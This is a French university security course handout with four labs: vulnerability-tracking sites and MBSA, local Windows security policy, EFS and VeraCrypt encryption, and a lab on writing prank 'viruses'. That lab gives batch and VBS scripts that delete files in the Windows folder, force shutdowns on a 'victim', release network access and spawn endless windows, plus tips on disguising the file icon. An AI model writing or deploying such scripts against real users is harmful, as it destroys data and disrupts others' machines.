Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                

UVS Sécurité Des Systèmes Informatiques 2021-2022 L3 Par M. Ndiaye TP1

Télécharger au format pdf ou txt
Télécharger au format pdf ou txt
Vous êtes sur la page 1sur 12

UVS Sécurité des Systèmes Informatiques 2021-2022

L3 Par M. NDIAYE TP1

TP 1 : Menaces -Vulnérabilités

Objectifs : Identifier les vulnérabilités systèmes et les menaces les plus récentes

NB : cet atelier comporte deux (02) activités.

Activité 1 :

1- Accédez au site Symmantec Security Response à l’adresse suivante :

http://securityresponse.symantec.com/

Consultez la liste des dernières menaces de virus et dites les noms des cinq premiers ?

2- Les sites les plus populaires et les plus fiables permettant de se défendre contre les

menaces de sécurité affectant les ordinateurs et les réseaux sont :

✓ https://nvd.nist.gov

✓ https://www.securityfocus.com

✓ https://nvd.nist.gov/

✓ https://cve.mitre.org/

Vous consulterez ces sites pour identifier les menaces de sécurité récentes

3- Tous les jours, de nouvelles vulnérabilités sont découvertes et publiées sur internet. Ces

vulnérabilités sont rapidement utilisées, par des personnes malveillantes, pour affecter la

sécurité de vos systèmes. Les sociétés doivent mettre en place des contre-mesures au plus tôt,

et ensuite déployer des correctifs définitifs.

Chaque jour, Vigilance annonce ces vulnérabilités publiques et indique comment s'en

protéger.

Consulter les vulnérabilités les plus récentes sur le site : https://vigilance.fr/


Activité 2 : outil MBSA

MBSA est l'abréviation de Microsoft Baseline Security Analyzer. Ce logiciel est fourni

par Microsoft afin d’aider à l’analyse des problèmes de sécurité dans Microsoft Windows.

1. Installation
Vous devez installer l’outil MBSA après l’avoir téléchargé (ou acquis auprès du forma-
teur)
2. Recherche de vulnérabilités
a- Lancez l’outil
b- Cliquez sur Analyser un ordinateur ou Scan computer
c- Cliquez sur Démarrer l’analyse.
d- Affichez le rapport de sécurité et fermez MBSA. Les résultats sont ensuite présentés
sous la forme d'un tableau central avec un rapport détaillé pour chaque machine.
3. Correction des vulnérabilités
Cliquez sur le lien Comment corriger le problème. Dans la page des résultats, la solution et
les instructions vous indiquent les mesures que vous devez prendre pour corriger le pro-
blème
UVS Sécurité des Systèmes Informatiques 2021-2022
L3 Par M. NDIAYE TP2

TP 2 : Malwares

Objectif :

Programmer des virus avec bloc-notes

Activité 1 :

Pour commencer, ouvrez votre éditeur de texte préféré (ex : bloc-notes). Ensuite, tapez sans
sauter de ligne :

del C: windows*.bmp cls

Après, enregistrez le code avec l’extension *.bat (ex : bjr.bat)

Attention : N’ouvrez en aucun cas le fichier sur votre ordinateur, le virus s’exécutera !

del : sert à supprimer

C : windows : situe le dossier où la commande doit avoir lieu

* : suivi d'une extension désigne tous les dossiers portant cette extension dans l'exemple
l'extension est *.bmp. Donc ce mini virus supprimera tous les fichiers portant l'extension
*.bmp (en l’occurrence des images) se trouvant dans Windows.
Ce virus pourrait être plus dangereux si vous changiez l’extension en une autre plus
importante.
Activité 2 :

Important : Pour que les fichiers .bat ou .vbs soit plus réaliste, il faut :
- créer un .bat ou .vbs

- Ensuite faire un clic-droit dessus puis envoyer vers bureau

-Ensuite sur votre bureau faites un clic-droit sur le raccourci puis sur propriété, puis sur
changer d'icone et choisissez une icône.

1- Ce (faux) virus consiste à quand vous ouvrez le fichier, un message s'affiche avec un bouton
OK. Vous appuyez sur OK mais un autre message de ce genre apparaît !! Ainsi de suite ... ;)

Voici les codes à insérer dans le bloc-notes :

msgbox "bonjour ?"


msgbox "oui ?"
msgbox "ou non ?

Enregistrez avec l’extension .vbs (ex : lol.vbs)


2- Ce virus consiste à tourner en boucle une erreur Windows, puis quand vous essayer de la
fermer (l'erreur), une calculatrice s’affiche !! Mais l'erreur ne part pas !!

Voici les codes à insérer dans le bloc-notes :

echo off
:main
start sol.exe
start calc.exe
goto :main

Enregistrez avec l’extension .bat

3- Ce virus consiste à quand vous l'ouvrez votre ordinateur s'éteint.

Voici les codes à insérer dans le bloc-notes

@echo off

shutdown -s -t 10 -c "ton pc vas s'éteindre"

(-t sert à poser un laps de temps avant que l'ordinateur de votre victime s'éteint ;)

(-c sert à mettre un commentaire à votre victime quand celui-ci ouvre le fichier)

Enregistrez avec l’extension .bat

NB :

Vous pouvez mettre d'autre d'truc a la place de shutdown -s

shutdown -s -t 0 pour éteindre l'ordinateur

shutdown -r -t 0 pour éteindre l'ordinateur et le redémarrer

shutdown -f -t 0 pour éteindre l'ordinateur sans se soucier de la sauvegarde des documents


ouverts

4- Ce virus bloque l’accès de quiconque à Internet.

Voici le code à insérer dans le Bloc-notes.

@echo off

ipconfig /release

Enregistrez avec l’extension .bat


5- Ce virus consiste à ouvrir un nombre infini de fenêtres

Voici le code à insérer et à enregistrer avec l’extension .bat

@echo off
CLS
:A
start iexplore.exe
goto A

Ces commandes vont demander à l’ordinateur d’ouvrir une fenêtre d’Internet Explorer (ou du
programme que vous avez spécifié : iexplore.exe - Internet Explorer, calc.exe - La
calculatrice et notepad.exe - Le bloc-notes) et de retourner directement à la ligne de
commande juste avant qu’il n’ouvre Internet Explorer, ce qui va entraîner une répétition infinie
de l’ouverture d’Internet Explorer jusqu’à ce que l’invite de commande soit fermée ou que
l’ordinateur plante.

6. Matrix

Voici un virus plutôt visuel qui permet de faire apparaitre plein de chiffre défiler
Voici le programme à insérer dans le Bloc-notes et à enregistre avec l’extension .bat )
@echo off
Title The Matrix
color 02
:rss
echo %random%%random%%random%%random%%random%
%random%%random%%random%%random%%random%
%random%%random%%random%%random%%random%
%random%%random%%random%%random%%random%
%random%%random%%random%%random%%random%
%random%%random%%random%%random%%random%
goto:rss
UVS Sécurité des Systèmes Informatiques 2021-2022
L3 Par M. NDIAYE TP 3

TP 3 : Configuration de la stratégie de sécurité locale


de Windows

Objectifs :

La stratégie de sécurité locale de Windows permet de configurer de nombreux éléments de


sécurité pour les ordinateurs autonomes qui ne font pas partie d'un domaine Active Directory.
Vous modifierez les exigences relatives aux mots de passe, activerez l'audit, configurerez des
droits d'utilisateur et définirez certaines options de sécurité. Vous utiliserez ensuite le
Gestionnaire d'événements pour voir les informations enregistrées.

I. Matériel conseillé

Un ordinateur avec Windows installé

Etape 1 : Examinez les exigences en matière de sécurité.

Un client a besoin de six ordinateurs Windows autonomes dans une de ses filiales. Ils doivent
être configurés conformément à la stratégie de sécurité de l'entreprise. Ces ordinateurs ne font
pas partie d'un domaine Active Directory. Les stratégies doivent être configurées
manuellement sur chaque ordinateur.

II. La stratégie de sécurité est la suivante :

Les mots de passe doivent contenir au moins 8 caractères.

✓ Les mots de passe doivent être changés tous les 90 jours.

✓ Les utilisateurs peuvent changer de mot de passe une fois par jour.

✓ Les utilisateurs peuvent réutiliser un mot de passe unique après l'utilisation de 8


autres.

✓ Les mots de passe doivent comprendre trois des quatre éléments suivants :

• Au moins un caractère alphanumérique en minuscules

• Au moins un caractère alphanumérique en majuscules

• Au moins un caractère numérique.

• Au moins un symbole.
✓ Les utilisateurs ne peuvent plus accéder à leur ordinateur après 5 tentatives erronées de
saisie du mot de passe. Les utilisateurs doivent patienter 5 minutes avant que le comp-
teur se réinitialise et permette à nouveau de saisir un mot de passe.

✓ Chaque paramètre de sécurité de la stratégie d'audit doit être activé.

✓ Après 30 minutes d'inactivité, l'utilisateur est automatiquement déconnecté

✓ Les utilisateurs doivent ouvrir une session avant de retirer l'ordinateur portable de la
station d'accueil.

✓ Lors de la connexion, le titre et le texte suivants doivent s'afficher :

• Titre : Attention :

• Texte : Votre activité est surveillée. Cet ordinateur est conçu pour une
utilisation professionnelle uniquement.

✓ Les utilisateurs reçoivent un rappel les avertissant qu'ils doivent changer de mot de
passe 7 jours avant son expiration.

Etape 2 : Configurez les paramètres de sécurité Stratégie de verrouillage du compte.


a. Selon la stratégie de sécurité définie à l'étape 1, combien de fois l'utilisateur est-il
autorisé à tenter d'ouvrir une session avant le verrouillage du compte ?
b. Combien de temps l'utilisateur doit-il attendre avant d'essayer de se reconnecter ?
c. Utilisez les paramètres de sécurité Stratégie de verrouillage du compte dans Stratégie
de sécurité locale pour configurer les exigences de la stratégie. Lorsque vous avez
terminé, la configuration doit être similaire à celle-ci.
Etape 3 : Configurez les paramètres de sécurité de la stratégie d'audit.

Etape 4 : Configurez les paramètres de sécurité Stratégies locales.

Etape 5 : Testez les paramètres de sécurité Stratégie de mot de passe.


UVS Sécurité des Systèmes Informatiques 2021-2022
L3 Par M. NDIAYE TP4
TP 4 : Cryptage des fichiers et Partitions

Objectifs :

Le chiffrement est un processus de conversion des informations en un format non accessible


en lecture pour une partie non autorisée. Seule une personne fiable et autorisée, dotée du code
secret ou du mot de passe peut déchiffrer les données et accéder à leur format original. Le
chiffrement proprement dit n’empêche pas l’interception des données par un tiers. Le
chiffrement ne peut qu’empêcher une personne non autorisée à visionner ou à accéder au
contenu.

Des programmes sont utilisés pour chiffrer des fichiers, des dossiers et même des disques
entiers.

Activité 1 : Système EFS (Encrypting File System) de Windows

Le système EFS (Encrypting File System) de Windows permet de chiffrer les données. Cette
fonction est directement liée à un compte d'utilisateur. Seul l'utilisateur ayant chiffré les
données pourra à nouveau y accéder. Pour chiffrer des données à l'aide du système EFS dans
toutes les versions de Windows, procédez comme suit :

Etape 1 : Sélectionnez un ou plusieurs fichiers ou dossiers.

Etape 2 : Cliquez avec le bouton droit sur >Propriétés des données sélectionnées.

Etape 3 : Cliquez sur Avancé.

Etape 4 : Cochez la case Chiffrer le contenu pour sécuriser les données.

Etape 5 : Les fichiers et dossiers ayant été chiffrés avec le système EFS sont affichés en vert
(voir ci-contre).
Activité 2 : Veracrypt

VeraCrypt est un logiciel qui permet le cryptage des fichiers et partitions sous forme de
conteneur global ou fichier unique, qui fonctionne sous GNU/Linux, MacOS et Windows.

I. Prérequis

Disposer d’un logiciel de virtualisation VMWare et d’une machine virtuelle Windows 7

II. Installation

1. Télécharger et installer VeraCrypt.

2. Lancez VeraCrypt en double cliquant sur son raccourci sur le Bureau.

3. Cliquez sur le bouton Créer un volume.

4. Sélectionnez l'option Chiffrer la partition ou l'intégralité du disque dur système et


cliquez sur Suivant.

5. Sélectionnez l'option Non pour ne pas crypter l'éventuelle partition RECOVERY de


restauration créée par le constructeur de votre ordinateur et cliquez sur Suivant.

6. Sélectionnez l'option Amorçage si vous n'avez pas d'autres systèmes installés en même
temps que Windows (d'autres versions de Windows, Linux, etc…) et cliquez sur
Suivant.
7. Laissez l'algorithme de chiffrement à AES et cliquez sur Suivant.

8. Saisissez alors un mot de passe complexe pour protéger votre disque dur. Ce mot de
passe sera nécessaire pour accéder à votre disque dur. Confirmez-le et cliquez sur
Suivant.
9. Déplacez la souris dans tous les sens quelques secondes afin de générer des clés de
chiffrement et cliquez sur Suivant.

10. Cliquez sur Suivant.

III. Utiliser le disque dur crypté

Le logiciel vous invite alors à créer un CD de secours qui vous permettra de démarrer votre
ordinateur si le logiciel de boot VeraCrypt est endommagé et de décrypter votre disque dur si
Windows ne démarre plus. Dans tous les cas, votre mot de passe sera nécessaire.

✓ Au démarrage de votre ordinateur, votre mot de passe vous est demandé. Saisissez-le
et validez pour démarrer Windows.
✓ En cas de vol de votre ordinateur ou de votre disque dur, les voleurs ne pourront pas
accéder à vos données. Ils devront saisir votre mot de passe qu'ils ne connaissent pas.

✓ Si le disque dur est branché dans un boitier ou comme disque secondaire, il est
illisible. Vos données ne risquent rien.

Vous aimerez peut-être aussi